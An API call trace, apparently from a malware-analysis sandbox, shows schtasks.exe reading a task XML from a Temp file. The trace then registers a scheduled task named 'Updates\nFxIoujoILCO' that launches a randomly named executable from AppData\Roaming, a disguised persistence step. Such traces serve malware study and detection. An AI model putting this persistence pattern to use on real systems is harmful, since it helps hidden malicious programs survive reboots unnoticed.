[0154.044] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|s|") returned 3
[0154.045] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.045] lstrlenW (lpString="|s|") returned 3
[0154.045] lstrlenW (lpString="|XML|") returned 5
[0154.045] SetLastError (dwErrCode=0x490)
[0154.045] lstrlenW (lpString="u") returned 1
[0154.045] lstrlenW (lpString="u") returned 1
[0154.045] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.045] lstrlenW (lpString="XML") returned 3
[0154.045] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.045] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|u|") returned 3
[0154.045] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.045] lstrlenW (lpString="|u|") returned 3
[0154.045] lstrlenW (lpString="|XML|") returned 5
[0154.045] SetLastError (dwErrCode=0x490)
[0154.045] lstrlenW (lpString="p") returned 1
[0154.045] lstrlenW (lpString="p") returned 1
[0154.045] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.045] lstrlenW (lpString="XML") returned 3
[0154.045] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.045] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|p|") returned 3
[0154.045] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.045] lstrlenW (lpString="|p|") returned 3
[0154.045] lstrlenW (lpString="|XML|") returned 5
[0154.045] SetLastError (dwErrCode=0x490)
[0154.045] lstrlenW (lpString="ru") returned 2
[0154.045] lstrlenW (lpString="ru") returned 2
[0154.045] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.046] lstrlenW (lpString="XML") returned 3
[0154.046] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.046] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|ru|") returned 4
[0154.046] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.046] lstrlenW (lpString="|ru|") returned 4
[0154.046] lstrlenW (lpString="|XML|") returned 5
[0154.046] SetLastError (dwErrCode=0x490)
[0154.046] lstrlenW (lpString="rp") returned 2
[0154.046] lstrlenW (lpString="rp") returned 2
[0154.046] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.046] lstrlenW (lpString="XML") returned 3
[0154.046] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.046] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|rp|") returned 4
[0154.046] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.046] lstrlenW (lpString="|rp|") returned 4
[0154.046] lstrlenW (lpString="|XML|") returned 5
[0154.046] SetLastError (dwErrCode=0x490)
[0154.046] lstrlenW (lpString="sc") returned 2
[0154.046] lstrlenW (lpString="sc") returned 2
[0154.046] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.046] lstrlenW (lpString="XML") returned 3
[0154.046] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.047] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|sc|") returned 4
[0154.047] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.047] lstrlenW (lpString="|sc|") returned 4
[0154.047] lstrlenW (lpString="|XML|") returned 5
[0154.047] SetLastError (dwErrCode=0x490)
[0154.047] lstrlenW (lpString="mo") returned 2
[0154.047] lstrlenW (lpString="mo") returned 2
[0154.047] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.047] lstrlenW (lpString="XML") returned 3
[0154.047] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.047] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|mo|") returned 4
[0154.047] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.047] lstrlenW (lpString="|mo|") returned 4
[0154.047] lstrlenW (lpString="|XML|") returned 5
[0154.047] SetLastError (dwErrCode=0x490)
[0154.047] lstrlenW (lpString="d") returned 1
[0154.047] lstrlenW (lpString="d") returned 1
[0154.047] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.047] lstrlenW (lpString="XML") returned 3
[0154.047] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.047] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|d|") returned 3
[0154.047] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.047] lstrlenW (lpString="|d|") returned 3
[0154.047] lstrlenW (lpString="|XML|") returned 5
[0154.047] SetLastError (dwErrCode=0x490)
[0154.047] lstrlenW (lpString="m") returned 1
[0154.047] lstrlenW (lpString="m") returned 1
[0154.048] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] lstrlenW (lpString="XML") returned 3
[0154.048] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|m|") returned 3
[0154.048] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.048] lstrlenW (lpString="|m|") returned 3
[0154.048] lstrlenW (lpString="|XML|") returned 5
[0154.048] SetLastError (dwErrCode=0x490)
[0154.048] lstrlenW (lpString="i") returned 1
[0154.048] lstrlenW (lpString="i") returned 1
[0154.048] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] lstrlenW (lpString="XML") returned 3
[0154.048] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|i|") returned 3
[0154.048] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.048] lstrlenW (lpString="|i|") returned 3
[0154.048] lstrlenW (lpString="|XML|") returned 5
[0154.048] SetLastError (dwErrCode=0x490)
[0154.048] lstrlenW (lpString="tn") returned 2
[0154.048] lstrlenW (lpString="tn") returned 2
[0154.048] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] lstrlenW (lpString="XML") returned 3
[0154.048] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|tn|") returned 4
[0154.048] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.048] lstrlenW (lpString="|tn|") returned 4
[0154.048] lstrlenW (lpString="|XML|") returned 5
[0154.049] SetLastError (dwErrCode=0x490)
[0154.049] lstrlenW (lpString="tr") returned 2
[0154.049] lstrlenW (lpString="tr") returned 2
[0154.049] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] lstrlenW (lpString="XML") returned 3
[0154.049] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|tr|") returned 4
[0154.049] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.049] lstrlenW (lpString="|tr|") returned 4
[0154.049] lstrlenW (lpString="|XML|") returned 5
[0154.049] SetLastError (dwErrCode=0x490)
[0154.049] lstrlenW (lpString="st") returned 2
[0154.049] lstrlenW (lpString="st") returned 2
[0154.049] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] lstrlenW (lpString="XML") returned 3
[0154.049] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|st|") returned 4
[0154.049] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.049] lstrlenW (lpString="|st|") returned 4
[0154.049] lstrlenW (lpString="|XML|") returned 5
[0154.049] SetLastError (dwErrCode=0x490)
[0154.049] lstrlenW (lpString="sd") returned 2
[0154.049] lstrlenW (lpString="sd") returned 2
[0154.049] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] lstrlenW (lpString="XML") returned 3
[0154.049] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|sd|") returned 4
[0154.049] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.050] lstrlenW (lpString="|sd|") returned 4
[0154.050] lstrlenW (lpString="|XML|") returned 5
[0154.050] SetLastError (dwErrCode=0x490)
[0154.050] lstrlenW (lpString="ed") returned 2
[0154.050] lstrlenW (lpString="ed") returned 2
[0154.050] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.050] lstrlenW (lpString="XML") returned 3
[0154.050] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.050] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|ed|") returned 4
[0154.050] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.050] lstrlenW (lpString="|ed|") returned 4
[0154.050] lstrlenW (lpString="|XML|") returned 5
[0154.050] SetLastError (dwErrCode=0x490)
[0154.050] lstrlenW (lpString="it") returned 2
[0154.050] lstrlenW (lpString="it") returned 2
[0154.050] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.050] lstrlenW (lpString="XML") returned 3
[0154.050] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.050] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|it|") returned 4
[0154.050] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.050] lstrlenW (lpString="|it|") returned 4
[0154.050] lstrlenW (lpString="|XML|") returned 5
[0154.050] SetLastError (dwErrCode=0x490)
[0154.050] lstrlenW (lpString="et") returned 2
[0154.050] lstrlenW (lpString="et") returned 2
[0154.050] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.050] lstrlenW (lpString="XML") returned 3
[0154.050] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.051] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|et|") returned 4
[0154.051] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.051] lstrlenW (lpString="|et|") returned 4
[0154.051] lstrlenW (lpString="|XML|") returned 5
[0154.051] SetLastError (dwErrCode=0x490)
[0154.051] lstrlenW (lpString="k") returned 1
[0154.051] lstrlenW (lpString="k") returned 1
[0154.051] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.051] lstrlenW (lpString="XML") returned 3
[0154.051] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.051] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|k|") returned 3
[0154.051] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.051] lstrlenW (lpString="|k|") returned 3
[0154.051] lstrlenW (lpString="|XML|") returned 5
[0154.051] SetLastError (dwErrCode=0x490)
[0154.051] lstrlenW (lpString="du") returned 2
[0154.051] lstrlenW (lpString="du") returned 2
[0154.051] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.051] lstrlenW (lpString="XML") returned 3
[0154.051] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.051] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|du|") returned 4
[0154.051] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.051] lstrlenW (lpString="|du|") returned 4
[0154.051] lstrlenW (lpString="|XML|") returned 5
[0154.052] SetLastError (dwErrCode=0x490)
[0154.052] lstrlenW (lpString="ri") returned 2
[0154.052] lstrlenW (lpString="ri") returned 2
[0154.052] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.052] lstrlenW (lpString="XML") returned 3
[0154.052] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.052] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|ri|") returned 4
[0154.052] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.052] lstrlenW (lpString="|ri|") returned 4
[0154.052] lstrlenW (lpString="|XML|") returned 5
[0154.052] SetLastError (dwErrCode=0x490)
[0154.052] lstrlenW (lpString="z") returned 1
[0154.052] lstrlenW (lpString="z") returned 1
[0154.052] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.052] lstrlenW (lpString="XML") returned 3
[0154.052] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.052] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|z|") returned 3
[0154.052] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.052] lstrlenW (lpString="|z|") returned 3
[0154.052] lstrlenW (lpString="|XML|") returned 5
[0154.052] SetLastError (dwErrCode=0x490)
[0154.052] lstrlenW (lpString="f") returned 1
[0154.052] lstrlenW (lpString="f") returned 1
[0154.052] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.052] lstrlenW (lpString="XML") returned 3
[0154.053] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.053] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|f|") returned 3
[0154.053] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.053] lstrlenW (lpString="|f|") returned 3
[0154.053] lstrlenW (lpString="|XML|") returned 5
[0154.053] SetLastError (dwErrCode=0x490)
[0154.053] lstrlenW (lpString="v1") returned 2
[0154.053] lstrlenW (lpString="v1") returned 2
[0154.053] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.053] lstrlenW (lpString="XML") returned 3
[0154.053] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.053] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|v1|") returned 4
[0154.053] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.053] lstrlenW (lpString="|v1|") returned 4
[0154.053] lstrlenW (lpString="|XML|") returned 5
[0154.053] SetLastError (dwErrCode=0x490)
[0154.053] lstrlenW (lpString="xml") returned 3
[0154.053] lstrlenW (lpString="xml") returned 3
[0154.053] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.053] lstrlenW (lpString="XML") returned 3
[0154.053] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.053] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|xml|") returned 5
[0154.053] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.053] lstrlenW (lpString="|xml|") returned 5
[0154.053] lstrlenW (lpString="|XML|") returned 5
[0154.053] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|"
[0154.053] SetLastError (dwErrCode=0x0)
[0154.053] SetLastError (dwErrCode=0x0)
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] lstrlenW (lpString="-/") returned 2
[0154.054] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0154.054] SetLastError (dwErrCode=0x490)
[0154.054] SetLastError (dwErrCode=0x490)
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp"
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] _memicmp (_Buf1=0x294d28, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.054] _memicmp (_Buf1=0x294d58, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.054] SetLastError (dwErrCode=0x7a)
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] lstrlenW (lpString="C") returned 1
[0154.054] SetLastError (dwErrCode=0x490)
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] GetProcessHeap () returned 0x280000
[0154.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x64) returned 0x296a58
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] GetProcessHeap () returned 0x280000
[0154.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x1fc) returned 0x296ac8
[0154.055] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0154.079] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0154.116] CoCreateInstance (in: rclsid=0x77230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7720fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xdcfb0 | out: ppv=0xdcfb0*=0x473e40) returned 0x0
[0154.427] TaskScheduler:ITaskService:Connect (This=0x473e40, serverName=0xdcf20*(varType=0x8, wReserved1=0x0, wReserved2=0xcf94, wReserved3=0xd, varVal1=0x0, varVal2=0xdd870), user=0xdcf30*(varType=0x0, wReserved1=0xd, wReserved2=0xcfb8, wReserved3=0xd, varVal1=0x75419cde, varVal2=0xdd870), domain=0xdcf40*(varType=0x0, wReserved1=0x0, wReserved2=0x1ec, wReserved3=0x0, varVal1=0xe, varVal2=0x0), password=0xdcf50*(varType=0x0, wReserved1=0x0, wReserved2=0x9c39, wReserved3=0x7541, varVal1=0x6c, varVal2=0xdd9f0)) returned 0x0
[0154.471] TaskScheduler:IUnknown:AddRef (This=0x473e40) returned 0x2
[0154.471] TaskScheduler:ITaskService:GetFolder (in: This=0x473e40, Path=0x0, ppFolder=0xdd054 | out: ppFolder=0xdd054*=0x473ea8) returned 0x0
[0154.473] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpc690.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x10c
[0154.474] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0xdc944 | out: lpFileSize=0xdc944*=1600) returned 1
[0154.474] ReadFile (in: hFile=0x10c, lpBuffer=0xdc94c, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0xdc954, lpOverlapped=0x0 | out: lpBuffer=0xdc94c*, lpNumberOfBytesRead=0xdc954*=0x2, lpOverlapped=0x0) returned 1
[0154.474] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0154.474] malloc (_Size=0x641) returned 0x4726f0
[0154.474] ReadFile (in: hFile=0x10c, lpBuffer=0x4726f0, nNumberOfBytesToRead=0x641, lpNumberOfBytesRead=0xdc954, lpOverlapped=0x0 | out: lpBuffer=0x4726f0*, lpNumberOfBytesRead=0xdc954*=0x640, lpOverlapped=0x0) returned 1
[0154.474] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x4726f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1601
[0154.475] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x4726f0, cbMultiByte=-1, lpWideCharStr=0x2a4ecc, cchWideChar=1601 | out: lpWideCharStr="\n\n \n 2014-10-25T14:27:44.8929027\n Q9IATRKPRH\\kEecfMwgj\n \n \n \n true\n Q9IATRKPRH\\kEecfMwgj\n \n \n false\n \n \n \n \n Q9IATRKPRH\\kEecfMwgj\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\n \n \n") returned 1601
[0154.475] SysStringLen (param_1="\n\n \n 2014-10-25T14:27:44.8929027\n Q9IATRKPRH\\kEecfMwgj\n \n \n \n true\n Q9IATRKPRH\\kEecfMwgj\n \n \n false\n \n \n \n \n Q9IATRKPRH\\kEecfMwgj\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\n \n \n") returned 0x640
[0154.475] VarBstrCat (in: bstrLeft=0x0, bstrRight="\n\n \n 2014-10-25T14:27:44.8929027\n Q9IATRKPRH\\kEecfMwgj\n \n \n \n true\n Q9IATRKPRH\\kEecfMwgj\n \n \n false\n \n \n \n \n Q9IATRKPRH\\kEecfMwgj\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\n \n \n", pbstrResult=0xdc8f4 | out: pbstrResult=0xdc8f4) returned 0x0
[0154.476] free (_Block=0x4726f0)
[0154.476] CloseHandle (hObject=0x10c) returned 1
[0154.477] lstrlenW (lpString="") returned 0
[0154.478] malloc (_Size=0xc) returned 0x473f00
[0154.478] SysStringLen (param_1="") returned 0x0
[0154.478] free (_Block=0x473f00)
[0154.478] lstrlenW (lpString="") returned 0
[0154.482] ITaskFolder:RegisterTask (in: This=0x473ea8, Path="Updates\\nFxIoujoILCO", XmlText="\n\n \n 2014-10-25T14:27:44.8929027\n Q9IATRKPRH\\kEecfMwgj\n \n \n \n true\n Q9IATRKPRH\\kEecfMwgj\n \n \n false\n \n \n \n \n Q9IATRKPRH\\kEecfMwgj\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\n \n \n", flags=2, UserId=0xdc930*(varType=0x8, wReserved1=0x0, wReserved2=0x4200, wReserved3=0x2a, varVal1="", varVal2=0x2a4200), password=0xdc940*(varType=0x0, wReserved1=0x2a, wReserved2=0x0, wReserved3=0x0, varVal1=0xdc9c8, varVal2=0x76987526), LogonType=0, sddl=0xdc954*(varType=0x0, wReserved1=0x2a, wReserved2=0x4200, wReserved3=0x2a, varVal1=0x0, varVal2=0x0), ppTask=0xdc9b4 | out: ppTask=0xdc9b4*=0x473f38) returned 0x0
[0154.869] GetProcessHeap () returned 0x280000
[0154.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295780
[0154.869] _memicmp (_Buf1=0x294cc8, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.869] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x296760, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0154.869] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0154.869] GetProcessHeap () returned 0x280000
[0154.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x82) returned 0x2a47c0
[0154.870] _vsnwprintf (in: _Buffer=0xdc9c0, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xdc964 | out: _Buffer="SUCCESS: The scheduled task \"Updates\\nFxIoujoILCO\" has successfully been created.\n") returned 82
[0154.870] _fileno (_File=0x754b2920) returned 1
[0154.870] _errno () returned 0x4707d8
[0154.870] _get_osfhandle (_FileHandle=1) returned 0x7
[0154.870] _errno () returned 0x4707d8
[0154.870] GetFileType (hFile=0x7) returned 0x2
[0154.871] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0154.871] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xdc928 | out: lpMode=0xdc928) returned 1
